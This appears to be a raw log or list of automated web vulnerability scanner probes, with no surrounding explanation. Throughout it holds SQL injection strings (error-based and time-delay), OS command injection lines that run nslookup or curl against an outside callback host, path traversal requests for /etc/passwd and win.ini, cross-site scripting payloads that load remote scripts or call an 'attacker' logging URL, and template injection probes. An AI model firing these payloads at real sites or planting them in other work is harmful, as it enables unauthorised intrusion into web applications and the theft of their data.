and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(102),CHAR(116),CHAR(120),CHAR(104),CHAR(103),CHAR(101),CHAR(114),CHAR(103)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and
(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(102),CHAR(116),CHAR(120),CHAR(104),CHAR(103),CHAR(101),CHAR(114),CHAR(103)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(102)+CHAR(116)+CHAR(120)+CHAR(104)+CHAR(103)+CHAR(101)+CHAR(114)+CHAR(103)) FROM syscolumns)
(length(CTXSYS.DRITHSX.SN(user,(select CHR(52)||CHR(67)||CHR(117)||CHR(102)||CHR(116)||CHR(120)||CHR(104)||CHR(103)||CHR(101)||CHR(114)||CHR(103) from DUAL))))
(select CHR(52)||CHR(67)||CHR(117)||CHR(102)||CHR(116)||CHR(120)||CHR(104)||CHR(103)||CHR(101)||CHR(114)||CHR(103) from DUAL)
'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(109),CHAR(113),CHAR(104),CHAR(102),CHAR(114),CHAR(102),CHAR(102),CHAR(102)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(109),CHAR(113),CHAR(104),CHAR(102),CHAR(114),CHAR(102),CHAR(102),CHAR(102)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))'
'+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(109)+CHAR(113)+CHAR(104)+CHAR(102)+CHAR(114)+CHAR(102)+CHAR(102)+CHAR(102)) FROM syscolumns)+'
'||(length(CTXSYS.DRITHSX.SN(user,(select CHR(52)||CHR(67)||CHR(117)||CHR(109)||CHR(113)||CHR(104)||CHR(102)||CHR(114)||CHR(102)||CHR(102)||CHR(102) from DUAL))))||'
'(select CHR(52)||CHR(67)||CHR(117)||CHR(109)||CHR(113)||CHR(104)||CHR(102)||CHR(114)||CHR(102)||CHR(102)||CHR(102) from DUAL)'
"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(98),CHAR(100),CHAR(109),CHAR(98),CHAR(102),CHAR(122),CHAR(100),CHAR(120)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"
"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(98),CHAR(100),CHAR(109),CHAR(98),CHAR(102),CHAR(122),CHAR(100),CHAR(120)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"
"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(98)+CHAR(100)+CHAR(109)+CHAR(98)+CHAR(102)+CHAR(122)+CHAR(100)+CHAR(120)) FROM syscolumns)+"
"||(length(CTXSYS.DRITHSX.SN(user,(select CHR(52)||CHR(67)||CHR(117)||CHR(98)||CHR(100)||CHR(109)||CHR(98)||CHR(102)||CHR(122)||CHR(100)||CHR(120) from DUAL))))||"
"(select CHR(52)||CHR(67)||CHR(117)||CHR(98)||CHR(100)||CHR(109)||CHR(98)||CHR(102)||CHR(122)||CHR(100)||CHR(120) from DUAL)"
555ijqeZ9Rf')) OR 40=(SELECT 40 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
EXTRACTVALUE(1, CONCAT(0x3a,CHAR(52),CHAR(67),CHAR(117),CHAR(102),CHAR(116),CHAR(120),CHAR(104),CHAR(103),CHAR(101),CHAR(114),CHAR(103)))
and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(102),CHAR(116),CHAR(120),CHAR(104),CHAR(103),CHAR(101),CHAR(114),CHAR(103)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and
(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(102),CHAR(116),CHAR(120),CHAR(104),CHAR(103),CHAR(101),CHAR(114),CHAR(103)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(102)+CHAR(116)+CHAR(120)+CHAR(104)+CHAR(103)+CHAR(101)+CHAR(114)+CHAR(103)) FROM syscolumns)
convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(102)+CHAR(116)+CHAR(120)+CHAR(104)+CHAR(103)+CHAR(101)+CHAR(114)+CHAR(103))
(length(CTXSYS.DRITHSX.SN(user,(select CHR(52)||CHR(67)||CHR(117)||CHR(102)||CHR(116)||CHR(120)||CHR(104)||CHR(103)||CHR(101)||CHR(114)||CHR(103) from DUAL))))
(select CHR(52)||CHR(67)||CHR(117)||CHR(102)||CHR(116)||CHR(120)||CHR(104)||CHR(103)||CHR(101)||CHR(114)||CHR(103) from DUAL)
'EXTRACTVALUE(1, CONCAT(0x3a,CHAR(52),CHAR(67),CHAR(117),CHAR(109),CHAR(113),CHAR(104),CHAR(102),CHAR(114),CHAR(102),CHAR(102),CHAR(102)))'
'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(109),CHAR(113),CHAR(104),CHAR(102),CHAR(114),CHAR(102),CHAR(102),CHAR(102)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(109),CHAR(113),CHAR(104),CHAR(102),CHAR(114),CHAR(102),CHAR(102),CHAR(102)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))'
'+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(109)+CHAR(113)+CHAR(104)+CHAR(102)+CHAR(114)+CHAR(102)+CHAR(102)+CHAR(102)) FROM syscolumns)+'
'+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(109)+CHAR(113)+CHAR(104)+CHAR(102)+CHAR(114)+CHAR(102)+CHAR(102)+CHAR(102))+'
'||(length(CTXSYS.DRITHSX.SN(user,(select CHR(52)||CHR(67)||CHR(117)||CHR(109)||CHR(113)||CHR(104)||CHR(102)||CHR(114)||CHR(102)||CHR(102)||CHR(102) from DUAL))))||'
'(select CHR(52)||CHR(67)||CHR(117)||CHR(109)||CHR(113)||CHR(104)||CHR(102)||CHR(114)||CHR(102)||CHR(102)||CHR(102) from DUAL)'
"EXTRACTVALUE(1, CONCAT(0x3a,CHAR(52),CHAR(67),CHAR(117),CHAR(98),CHAR(100),CHAR(109),CHAR(98),CHAR(102),CHAR(122),CHAR(100),CHAR(120)))"
"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(98),CHAR(100),CHAR(109),CHAR(98),CHAR(102),CHAR(122),CHAR(100),CHAR(120)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"
"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(98),CHAR(100),CHAR(109),CHAR(98),CHAR(102),CHAR(122),CHAR(100),CHAR(120)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"
"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(98)+CHAR(100)+CHAR(109)+CHAR(98)+CHAR(102)+CHAR(122)+CHAR(100)+CHAR(120)) FROM syscolumns)+"
"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(98)+CHAR(100)+CHAR(109)+CHAR(98)+CHAR(102)+CHAR(122)+CHAR(100)+CHAR(120))+"
"||(length(CTXSYS.DRITHSX.SN(user,(select CHR(52)||CHR(67)||CHR(117)||CHR(98)||CHR(100)||CHR(109)||CHR(98)||CHR(102)||CHR(122)||CHR(100)||CHR(120) from DUAL))))||"
"(select CHR(52)||CHR(67)||CHR(117)||CHR(98)||CHR(100)||CHR(109)||CHR(98)||CHR(102)||CHR(122)||CHR(100)||CHR(120) from DUAL)"
555
555
555
555
555
555
555
555
555
555
555
555
echo iiatfn$()\ ayazkj\nz^xyu||a #' &echo iiatfn$()\ ayazkj\nz^xyu||a #|" &echo iiatfn$()\ ayazkj\nz^xyu||a #
response.write(9673018*9290889)
&echo xqirdw$()\ gpkehv\nz^xyu||a #' &echo xqirdw$()\ gpkehv\nz^xyu||a #|" &echo xqirdw$()\ gpkehv\nz^xyu||a #
'+response.write(9673018*9290889)+'
555&echo srsgyt$()\ mxknvw\nz^xyu||a #' &echo srsgyt$()\ mxknvw\nz^xyu||a #|" &echo srsgyt$()\ mxknvw\nz^xyu||a #
OxJZkF5U
"+response.write(9673018*9290889)+"
zVBofTv3: anokNP1U
|echo xqozhv$()\ kiztmk\nz^xyu||a #' |echo xqozhv$()\ kiztmk\nz^xyu||a #|" |echo xqozhv$()\ kiztmk\nz^xyu||a #
555|echo eqcosb$()\ xugieo\nz^xyu||a #' |echo eqcosb$()\ xugieo\nz^xyu||a #|" |echo eqcosb$()\ xugieo\nz^xyu||a #
1ENXGQL95XD0
555
expr 9000789522 - 922847
555
(nslookup -q=cname hitcopmzvqrmo41883.bxss.me||curl hitcopmzvqrmo41883.bxss.me))
555
555
$(nslookup -q=cname hitfubjsohxvi6b18e.bxss.me||curl hitfubjsohxvi6b18e.bxss.me)
555
555
&nslookup -q=cname hitdwejdtutxjb55fc.bxss.me&'\"`0&nslookup -q=cname hitdwejdtutxjb55fc.bxss.me&`'
../../../../../../../../../../../../../../etc/passwd
&(nslookup -q=cname hitedbypwuqyff4e41.bxss.me||curl hitedbypwuqyff4e41.bxss.me)&'\"`0&(nslookup -q=cname hitedbypwuqyff4e41.bxss.me||curl hitedbypwuqyff4e41.bxss.me)&`'
../../../../../../../../../../../../../../windows/win.ini
|(nslookup -q=cname hittbkzogyijvac15d.bxss.me||curl hittbkzogyijvac15d.bxss.me)
555<esi:include src="http://bxss.me/rpb.png"/>
`(nslookup -q=cname hitiiicratkqn187ba.bxss.me||curl hitiiicratkqn187ba.bxss.me)`
file:///etc/passwd
555
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitskcgrbetqxb63a7.bxss.me||curl${IFS}hitskcgrbetqxb63a7.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitpvuelqtmla001d1.bxss.me||curl${IFS}hitpvuelqtmla001d1.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitpvuelqtmla001d1.bxss.me||curl${IFS}hitpvuelqtmla001d1.bxss.me)&`'
${10000148+9999651}
555
../555
555
./555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
/etc/shells
555
555
555
../../../../../../../../../../../../../../etc/shells
555
555
555
555
555
555
c:/windows/win.ini
555
555
bxss.me
Http://bxss.me/t/fit.txt
555
!(()&&!|*|*|
'"()
'
555
${@print(md5(31337))}
-1 OR 5*5=25 --
555"||sleep(27*1000)*xwueae||"
555
-1 OR 5*5=26 --
555
555
555
comments
555
555
555
'"()&%<zzz><ScRiPt >W826(9005)</ScRiPt>
555
555
555
5559697167
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
'"()&%<zzz><ScRiPt >ocq2(9759)</ScRiPt>
555-1 waitfor delay '0:0:15' --
555CwWNB2Mc'
555-1 OR 998=(SELECT 998 FROM PG_SLEEP(15))--
555-1) OR 735=(SELECT 735 FROM PG_SLEEP(15))--
555-1)) OR 336=(SELECT 336 FROM PG_SLEEP(15))--
555
555
555
555
555'"()&%<zzz><ScRiPt >oRYj(9451)</ScRiPt>
'"()&%<zzz><ScRiPt >oRYj(9202)</ScRiPt>
5559021009
555'"()&%<zzz><ScRiPt >x8Wt(9424)</ScRiPt>
'"()&%<zzz><ScRiPt >x8Wt(9592)</ScRiPt>
bfg7686\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7686
5559688855
bfgx9256\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9256
bfg1012\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl1012
<%={{={@{#{${dfb}}%>
555
bfgx9399\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9399
<th:t="${dfb}#foreach
555
<%={{={@{#{${dfb}}%>
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
dfb{{98991*97996}}xca
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >x8Wt(9147)</ScRiPt>
555<ScRiPt >oRYj(9438)</ScRiPt>
555<WVZG79>UZZA3[!+!]</WVZG79>
555<WVX3KH>4NDHA[!+!]</WVX3KH>
555<script>oRYj(9070)</script>
555<script>oRYj(9812)</script>9812
555<script>x8Wt(9370)</script>
555
555<script>x8Wt(9184)</script>9184
555<ScR<ScRiPt>IpT>oRYj(9558)</sCr<ScRiPt>IpT>
555<ScRiPt >oRYj(9527)</ScRiPt>
555<ScR<ScRiPt>IpT>x8Wt(9527)</sCr<ScRiPt>IpT>
555<ScRiPt >x8Wt(9937)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9506></ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9087></ScRiPt>
555<ScRiPt >oRYj(9757)</ScRiPt>
555<ScRiPt >x8Wt(9582)</ScRiPt>
555<svg \xa0onload=oRYj(9337)
555<svg \xa0onload=x8Wt(9884)
555<isindex type=image src=1 onerror=oRYj(9994)>
555<iframe src='data:text/html
555<isindex type=image src=1 onerror=x8Wt(9159)>
555<body onload=oRYj(9703)>
555<iframe src='data:text/html
555
555<body onload=x8Wt(9526)>
555<img src=//xss.bxss.me/t/dot.gif onload=x8Wt(9576)>
555<img src=//xss.bxss.me/t/dot.gif onload=oRYj(9171)>
555<img src=xyz OnErRor=oRYj(9777)>
555<img src=xyz OnErRor=x8Wt(9672)>
555<img/src=">" onerror=alert(9619)>
555<img/src=">" onerror=alert(9858)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%52%59%6A%289414%29%3C%2F%73%43%72%69%70%54%3E
555<
%35%35%35%3C%53%63%52%69%50%74%20%3E%78%38%57%74%289455%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\x8Wt(9525)\u003C/sCripT\u003E
\xf6<img zzz onmouseover=oRYj(99261) //\xf6>
555<input autofocus onfocus=oRYj(9626)>
\xf6<img zzz onmouseover=x8Wt(97591) //\xf6>
<a HrEF=jaVaScRiPT:>
555<WMGOSI>YXCAU[!+!]</WMGOSI>
555
555
555'"()&%<zzz><ScRiPt >nsux(9153)</ScRiPt>
'"()&%<zzz><ScRiPt >nsux(9437)</ScRiPt>
5559604306
bfg6185\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6185
555'"()&%<zzz><ScRiPt >i0ab(9845)</ScRiPt>
'"()&%<zzz><ScRiPt >i0ab(9193)</ScRiPt>
bfgx8261\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8261
5559685910
bfg2461\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2461
555'"()&%<zzz><ScRiPt >sqST(9462)</ScRiPt>
bfgx5896\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5896
'"()&%<zzz><ScRiPt >sqST(9398)</ScRiPt>
<%={{={@{#{${dfb}}%>
555'"()&%<zzz><ScRiPt >GtYk(9961)</ScRiPt>
<th:t="${dfb}#foreach
5559578565
bfg5754\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5754
<%={{={@{#{${dfb}}%>
'"()&%<zzz><ScRiPt >GtYk(9264)</ScRiPt>
555
bfgx2658\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2658
555
5559421865
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
<%={{={@{#{${dfb}}%>
bfg9067\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9067
<th:t="${dfb}#foreach
bfgx9924\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9924
555
555
555
<%={{={@{#{${dfb}}%>
"}}dfb{{98991*97996}}xca
dfb{{98991*97996}}xca
<th:t="${dfb}#foreach
dfb{{98991*97996}}xca
<th:t="${dfb}#foreach
dfb{98991*97996}xca
"%}dfb{{98991*97996}}xca
"}dfb{98991*97996}xca
dfb${98991*97996}xca
dfb#{98991*97996}xca
dfb{#98991*97996}xca
555
555
"}dfb${98991*97996}xca
dfb{@98991*97996}xca
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{=98991*97996}}xca
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb@(98991*97996)xca
555
"}dfb#{98991*97996}xca
dfb<%=98991*97996%>xca
"}dfb{#98991*97996}xca
dfb{{98991*97996}}xca
dfb#set($x=98991*97996)${x}xca
dfb{{98991*97996}}xca
dfb{{"abc"|title}}xca
dfb[[${98991*97996}]]xca
print("dfb" . 98991*97996 . "xca")
"}dfb{@98991*97996}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
dfb__${98991*97996}__::.x
"}}dfb{{=98991*97996}}xca
dfb{@math key=98991 method="multiply" operand=97996/}xca
")dfb@(98991*97996)xca
555<ScR<ScRiPt>IpT>sqST(9844)</sCr<ScRiPt>IpT>
dfb{{98991*97996}}xca
"98991*97996*98991*97996
555<ScRiPt >sqST(9898)</ScRiPt>
555<ScRiPt >i0ab(9499)</ScRiPt>
"}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA
555<iframe src='data:text/html
555<script>i0ab(9596)</script>
%35%35%35%3C%53%63%52%69%50%74%20%3E%47%74%59%6B%289643%29%3C%2F%73%43%72%69%70%54%3E
'%}dfb{{98991*97996}}xca
555\u003CScRiPt\GtYk(9577)\u003C/sCripT\u003E
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9552></ScRiPt>
555<ScRiPt >i0ab(9769)</ScRiPt>
'}dfb{#98991*97996}xca
')dfb@(98991*97996)xca
<a HrEF=jaVaScRiPT:>
'}dfb{@math key=98991 method="multiply" operand=97996/}xca
555<WMBQRM>A1DSH[!+!]</WMBQRM>
555<img/src=">" onerror=alert(9117)>
'}}}dfb{{{this}}}xca
%35%35%35%3C%53%63%52%69%50%74%20%3E%69%30%61%62%289258%29%3C%2F%73%43%72%69%70%54%3E
555<ifRAme sRc=9771.com></IfRamE>
'}#{98991*97996*98991*97996}
'}dfb#{xca}=123
555\u003CScRiPt\i0ab(9174)\u003C/sCripT\u003E
555<ak0O9zP x=9011>
'}}dfb{{'abcd'.toUpperCase()}}xca
555<
\xf6<img zzz onmouseover=i0ab(90091) //\xf6>
555<input autofocus onfocus=i0ab(9175)>
'}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA
555<img sRc='http://attacker-9880/log.php?
<a HrEF=http://xss.bxss.me></a>
555<aiQGlh2<
'}}dfb{{98991*97996}}xca
<a HrEF=jaVaScRiPT:>
'}dfb[[${98991*97996}]]xca
555}body{zzz:Expre/**/SSion(i0ab(9760))}
555C6QYG <ScRiPt >i0ab(9218)</ScRiPt>
555<WAZ3HV>G1O34[!+!]</WAZ3HV>
555<ifRAme sRc=9460.com></IfRamE>
555'"()&%<zzz><ScRiPt >PhGx(9919)</ScRiPt>
'dfb__${98991*97996}__::.x
555<aH4d5cZ x=9550>
'}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<img sRc='http://attacker-9006/log.php?
1}}dfb{{98991*97996}}xca
'"()&%<zzz><ScRiPt >PhGx(9170)</ScRiPt>
555<a43kcjG<
1%}dfb{{98991*97996}}xca
5559438753
bfg10097\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10097
1}dfb{98991*97996}xca
bfgx8529\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8529
1}dfb${98991*97996}xca
<%={{={@{#{${dfb}}%>
555
1}dfb#{98991*97996}xca
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1}dfb{#98991*97996}xca
555
1}dfb{@98991*97996}xca
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
1}}dfb{{=98991*97996}}xca
dfb__${98991*97996}__::.x
1)dfb@(98991*97996)xca
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >PhGx(9283)</ScRiPt>
1%>dfb<%=98991*97996%>xca
1}dfb#set($x=98991*97996)${x}xca
555<W7HYT8>AYYOS[!+!]</W7HYT8>
1}dfb{{"abc"|title}}xca
555<script>PhGx(9320)</script>
1print("dfb" . 98991*97996 . "xca")
555<script>PhGx(9444)</script>9444
198991*97996*98991*97996
555<ScR<ScRiPt>IpT>PhGx(9535)</sCr<ScRiPt>IpT>
1}dfb{@math key=98991 method="multiply" operand=97996/}xca
555<ScRiPt >PhGx(9332)</ScRiPt>
1}}}dfb{{{this}}}xca
1}#{98991*97996*98991*97996}
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9216></ScRiPt>
1}dfb#{xca}=123
555<ScRiPt >PhGx(9688)</ScRiPt>
555<svg \xa0onload=PhGx(9662)
1}}dfb{{'abcd'.toUpperCase()}}xca
555<isindex type=image src=1 onerror=PhGx(9918)>
1}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA
1}}dfb{{98991*97996}}xca
555<iframe src='data:text/html
1}dfb[[${98991*97996}]]xca
555<body onload=PhGx(9391)>
1}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<img src=xyz OnErRor=PhGx(9754)>
555\u003CScRiPt\PhGx(9020)\u003C/sCripT\u003E
555<ScR<ScRiPt>IpT>nsux(9526)</sCr<ScRiPt>IpT>
555<ifRAme sRc=9918.com></IfRamE>
%35%35%35%3C%53%63%52%69%50%74%20%3E%6E%73%75%78%289463%29%3C%2F%73%43%72%69%70%54%3E
%35%35%35%3C%53%63%52%69%50%74%20%3E%6E%73%75%78%289463%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\nsux(9367)\u003C/sCripT\u003E
<a HrEF=http://xss.bxss.me></a>
555<ahyhEx7 x=9760>
555<a7XBuc3<
'"()&%<zzz><ScRiPt >EUhs(9424)</ScRiPt>
5559057482
bfg7577\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7577
bfgx9295\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9295
<%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
dfb{{98991*97996}}xca
dfb{98991*97996}xca
dfb${98991*97996}xca
dfb#{98991*97996}xca
dfb{#98991*97996}xca
dfb{@98991*97996}xca
dfb{{=98991*97996}}xca
dfb@(98991*97996)xca
dfb<%=98991*97996%>xca
dfb#set($x=98991*97996)${x}xca
dfb{{"abc"|title}}xca
print("dfb" . 98991*97996 . "xca")
98991*97996*98991*97996
dfb{@math key=98991 method="multiply" operand=97996/}xca
dfb{{{this}}}xca
#{98991*97996*98991*97996}
dfb#{xca}=123
dfb{{'abcd'.toUpperCase()}}xca
AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA
555'"()&%<zzz><ScRiPt >yhyW(9580)</ScRiPt>
dfb{{98991*97996}}xca
'"()&%<zzz><ScRiPt >yhyW(9680)</ScRiPt>
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
5559786150
bfg10421\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10421
555<ScRiPt >EUhs(9984)</ScRiPt>
555<WHE0JQ>RZMTV[!+!]</WHE0JQ>
bfgx2659\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2659
555<script>EUhs(9404)</script>
<%={{={@{#{${dfb}}%>
555<script>EUhs(9938)</script>9938
555<ScR<ScRiPt>IpT>EUhs(9967)</sCr<ScRiPt>IpT>
555
dfb{{98991*97996}}xca
dfb{{98991*97996}}xca
555<ScRiPt >EUhs(9250)</ScRiPt>
dfb{98991*97996}xca
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9250></ScRiPt>
dfb${98991*97996}xca
555<ScRiPt >EUhs(9550)</ScRiPt>
dfb#{98991*97996}xca
555<svg \xa0onload=EUhs(9316)
555<isindex type=image src=1 onerror=EUhs(9993)>
dfb{#98991*97996}xca
555<iframe src='data:text/html
555<body onload=EUhs(9554)>
dfb{@98991*97996}xca
555<img src=//xss.bxss.me/t/dot.gif onload=EUhs(9361)>
dfb{{=98991*97996}}xca
555<img src=xyz OnErRor=EUhs(9167)>
dfb@(98991*97996)xca
555<img/src=">" onerror=alert(9562)>
dfb<%=98991*97996%>xca
dfb#set($x=98991*97996)${x}xca
%35%35%35%3C%53%63%52%69%50%74%20%3E%45%55%68%73%289834%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\EUhs(9606)\u003C/sCripT\u003E
dfb{{"abc"|title}}xca
print("dfb" . 98991*97996 . "xca")
555<
98991*97996*98991*97996
\xf6<img zzz onmouseover=EUhs(90291) //\xf6>
555<input autofocus onfocus=EUhs(9008)>
dfb{@math key=98991 method="multiply" operand=97996/}xca
dfb{{{this}}}xca
#{98991*97996*98991*97996}
<a HrEF=http://xss.bxss.me></a>
dfb#{xca}=123
dfb{{'abcd'.toUpperCase()}}xca
<a HrEF=jaVaScRiPT:>
AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA
555}body{zzz:Expre/**/SSion(EUhs(9310))}
555cPIni <ScRiPt >EUhs(9387)</ScRiPt>
dfb{{98991*97996}}xca
555<WPKEQS>NJ99W[!+!]</WPKEQS>
dfb[[${98991*97996}]]xca
555<ifRAme sRc=9233.com></IfRamE>
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ajilRtS x=9274>
555<ScRiPt >yhyW(9166)</ScRiPt>
555<WOY7D4>ZEMUX[!+!]</WOY7D4>
555<img sRc='http://attacker-9534/log.php?
555<aujZJJA<
555<script>yhyW(9486)</script>
555<script>yhyW(9926)</script>9926
555<ScR<ScRiPt>IpT>yhyW(9389)</sCr<ScRiPt>IpT>
555<ScRiPt >yhyW(9916)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9443></ScRiPt>
555<ScRiPt >yhyW(9349)</ScRiPt>
555<svg \xa0onload=yhyW(9972)
555<isindex type=image src=1 onerror=yhyW(9582)>
555<iframe src='data:text/html
555<body onload=yhyW(9074)>
555<img src=//xss.bxss.me/t/dot.gif onload=yhyW(9498)>
555<img src=xyz OnErRor=yhyW(9869)>
555<img/src=">" onerror=alert(9656)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%79%68%79%57%289785%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\yhyW(9210)\u003C/sCripT\u003E
555<
\xf6<img zzz onmouseover=yhyW(99391) //\xf6>
555<input autofocus onfocus=yhyW(9982)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555'"()&%<zzz><ScRiPt >cb7d(9451)</ScRiPt>
555}body{zzz:Expre/**/SSion(yhyW(9083))}
555G2KIW <ScRiPt >yhyW(9503)</ScRiPt>
555<WYCL5W>NLBD8[!+!]</WYCL5W>
'"()&%<zzz><ScRiPt >cb7d(9693)</ScRiPt>
555<ifRAme sRc=9039.com></IfRamE>
5559158808
555<a6QIHC6 x=9177>
555<img sRc='http://attacker-9578/log.php?
bfg10119\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10119
555<aBtkRX0<
bfgx1373\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1373
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
"}}dfb{{98991*97996}}xca
"%>dfb<%=98991*97996%>xca
"}#{98991*97996*98991*97996}
"}dfb[[${98991*97996}]]xca
"}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
'}}dfb{{98991*97996}}xca
'%}dfb{{98991*97996}}xca
'}dfb{98991*97996}xca
'}dfb${98991*97996}xca
'}dfb#{98991*97996}xca
'}dfb{#98991*97996}xca
'}dfb{@98991*97996}xca
'}}dfb{{=98991*97996}}xca
')dfb@(98991*97996)xca
'%>dfb<%=98991*97996%>xca
'}dfb#set($x=98991*97996)${x}xca
